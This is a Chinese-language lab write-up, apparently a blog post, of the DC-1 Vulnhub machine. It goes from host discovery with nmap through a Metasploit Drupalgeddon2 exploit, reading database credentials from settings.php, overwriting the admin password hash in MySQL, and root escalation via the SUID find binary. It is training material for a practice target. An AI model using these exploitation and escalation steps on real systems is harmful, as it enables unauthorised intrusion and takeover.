DC-1靶机渗透

攻击机:kali IP:192.168.56.102

靶机:DC-1 IP:192.168.56.101

我的DC-1是在virtualbox打开的,导入VMware的话,扫描ip的时候扫不出来(不一定每个人都是这样)网络设置的是仅主机网络

559d21295078407d97595f96c7d336a1.png

kali是在VMware里的,网络设置为桥接模式,这样也能确保在同一c段,就能扫得出结果。

在kali终端输入ifconfig查看本机ip:192.168.56.102,得到之后可以使用命令

nmap 192.168.56.0/24

进行扫描,可以直接得到dc1的IP以及开放的端口。

494f3d88a3c74a128014fa8a4b62f75c.png

显而易见,靶机ip为192.168.56.101,且开放了80端口,确定的方法就可以看mac address那一行的末尾的信息,192.168.56.1这个IP的来源是unknown,而192.168.56.101的来源是virtualbox。除此之外还可以使用arp命令进行扫描,

扫描存活主机:arp-scan -l

扫描开放端口:nmap -sV 192.168.56.101

接着继续,看到开放了80端口之后,我们就可以用浏览器打开进行访问了。

03ceb1902bd54ec48ac88e2d1fb3e139.png

熟悉的人可以直接知道cms里是有Drupal的,不懂的可以用火狐的插件wappalyzer,也能显示出这个信息,这时候可以用kali自带的msf进行漏洞利用。

进入msf:msfconsole

查找漏洞利用模块:search drupal

e1382690affe401187922faf1f2f0974.png

可以发现有很多个版本的,这里我用2018年的这个,利用use进行调用漏洞模块:use 1

或者你也可以输入1后面的那一长串东西,use exploit/unix/webapp/drupal_drupalgeddon 2

接着使用命令:show options设置必选项,把lhost设置为kali的ip,rhosts设置为dc-1的ip

命令:

set rhosts 192.168.56.101
set lhost 192.168.56.102

设置完必选项之后,开始运行:exploit,这时就转换成了meterpreter,之后反弹一个交互式的shell

5be0c96464114421b235a43b27219988.png代码:

python -c 'import pty;pty.spawn("/bin/sh")'

 之后打开目录就发现了第一个flag。

bd1c9a75f96948659312dfef5a24a5b2.png

得到提示说需要配置cms文件,百度了解到Drupal的默认配置文件为 /var/www/sites/default/settings.php,打开settings.php文件之后就可以发现有flag2和mysql数据库的用户名和密码

b2264590d1b44731aa0f7050cbb78e1c.png

然后进行数据库的连接

f0185b3311284604adb1a1353c42b849.png

连接正常,采取重置用户密码 的操作,查询资料了解到一般drupal对数据库的加密方法是把加密脚本放在网站根目录下scripts文件下

bc41fede9df248248577e78ddbebf715.png

看到有个password-hash.sh文件,使用drupal自带脚本重新生成密码

ac1b46f15e314645a4cd23874bb3e02d.png

得到新密码的hash值之后对密码就可以进行修改密码的操作了,重新连接mysql数据库

输入

update drupaldb.users set pass="hash值" where uid=1;

e4ceeb6c7b304a2ebb3ba416a6f826b5.png

 修改完成之后进入网站进行登录,

bb1184428db94920a8b06ca821cbc85b.png

此时在conten下发现有flag3

1314e163386947b88ed23bfa250c9f26.png

e2aecd0696d8488baa56000db2e89d3e.png

根据提示的意思是要找passwd文件,且涉及到提权的问题。

进入etc目录找到passwd文件并打开

31c0abca74bc4e3bbe916a57b708101d.png

e83a808dbf94432eb850d4f727263f7b.png

此时发现home目录下有flag4

a66b87dc5c7740fca28d66cea760efa1.png

得到提示说以同样的方式找到在root下的flag。

那就要进行提权了,接下来查找具有root权限的命令。

find /perm -u=s -type f 2>/dev/null
find / -perm -4000

c38f3271257b4fa89032b91bb25aa562.png

d0ccec18ccc747b29f6226403f225374.png

发现find本身就是root权限的命令,此时也发现了它的路径:/usr/bin/find

接着用find命令进行提权:

ls -lh /usr/bin/find
find ./ aaa -exec '/bin/sh' \;

之后回到根目录进入root文件夹,发现最后的flag

4d5bf51fc4ab4ceeb7e39213fa915513.png

至此,DC-1靶机结束

参考链接:Vulnhub靶机DC_1渗透_哔哩哔哩_bilibili

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值